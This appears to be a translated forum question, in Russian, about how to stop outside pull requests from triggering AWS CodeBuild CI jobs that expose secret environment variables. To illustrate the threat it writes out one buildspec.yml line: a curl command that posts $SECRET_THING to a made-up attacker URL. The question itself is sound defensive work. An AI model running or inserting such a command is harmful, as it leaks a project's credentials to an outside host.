Я столкнулся с ситуацией, когда у меня есть репозиторий на GitHub, который я хочу обнародовать.
В настоящее время одна из проверок PR запускает тесты CI в AWS CodeBuild.
Из-за характера тестов существуют переменные среды, которые содержат секреты. Результаты / журналы из результатов сборки не будут публичными, что является хорошей вещью.
AWS CodeBuild использует файл buildspec.yml
для запуска команд в CI.
Если бы у меня была переменная окружения, например $SECRET_THING
, злоумышленник мог бы просто открыть PR, добавив к buildspec.yml
, например:
- curl -X POST -d"thesecret=$SECRET_THING" https://mwahahahaha.com/grab_it
Который затем отправит себе секрет.
Используя параметр в GitHub, GitHub проверяет API или CodeBuild, есть ли способ, который потребует ручного вмешательства для запуска проверки, предпочтительно после проверки кода? (например, кнопка, нажимаемая только авторизованным соавтором на странице PR)